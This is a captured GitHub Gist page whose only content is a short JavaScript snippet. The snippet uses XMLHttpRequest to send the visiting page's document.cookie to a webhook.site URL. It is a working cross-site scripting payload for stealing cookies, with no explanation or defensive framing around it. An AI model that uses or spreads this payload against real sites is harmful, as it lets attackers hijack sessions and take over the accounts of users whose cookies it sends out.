Skip to content

Instantly share code, notes, and snippets.

@nghialuffy
Created July 11, 2023 16:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nghialuffy/24b16d0c29288835523f014e83c3b87b to your computer and use it in GitHub Desktop.
Save nghialuffy/24b16d0c29288835523f014e83c3b87b to your computer and use it in GitHub Desktop.
var xhttp = new XMLHttpRequest();
xhttp.open('GET', 'https://webhook.site/22bf9020-43c4-48c0-8d34-483347236b04/?' + document.cookie, true);
xhttp.send();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment